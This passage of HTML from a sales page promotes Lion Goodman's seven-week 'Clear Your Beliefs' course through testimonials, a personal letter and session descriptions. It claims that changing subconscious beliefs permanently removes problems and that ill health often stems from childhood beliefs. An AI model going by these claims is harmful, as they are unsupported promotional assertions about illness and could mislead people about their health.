simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work. No technique will cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. No free rides.\r\n\r\nIn our ten years of experience using this technique with thousands of clients, we''ve seen that nearly every problem has its source at the causal causal level, down where your beliefs are stored. Itt takes significant effort to clear your deepest beliefs – the ones that got programmed before you could speak.\r\n\r\nThat''s why we offer a <strong>Coaching Option</strong> with our program. Our professionally trained <em>Clear Your Beliefs Coaches</em> can guide you on your journey down to the deepest level of your psyche – a place that''s difficult to get to all by yourself.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, 